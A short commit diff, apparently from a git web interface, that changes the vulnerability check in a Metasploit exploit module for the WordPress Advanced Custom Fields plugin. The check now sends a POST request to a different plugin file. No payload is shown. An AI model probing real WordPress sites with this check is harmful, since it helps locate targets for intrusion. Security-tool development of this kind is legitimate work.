Fixed the check
Turns out the export returns a 500 by default. Fixing.bug/bundler_fix
parent
dd0482cb9d
commit
4ba5b45ad3
|
@ -59,8 +59,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
uri << '/' if uri[-1,1] != '/'
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => "#{uri}wp-content/plugins/advanced-custom-fields/core/actions/export.php"
|
||||
'method' => 'POST',
|
||||
'uri' => "#{uri}wp-content/plugins/advanced-custom-fields/core/api.php"
|
||||
})
|
||||
|
||||
if res and res.code == 200
|
||||
|
|
Loading…
Reference in New Issue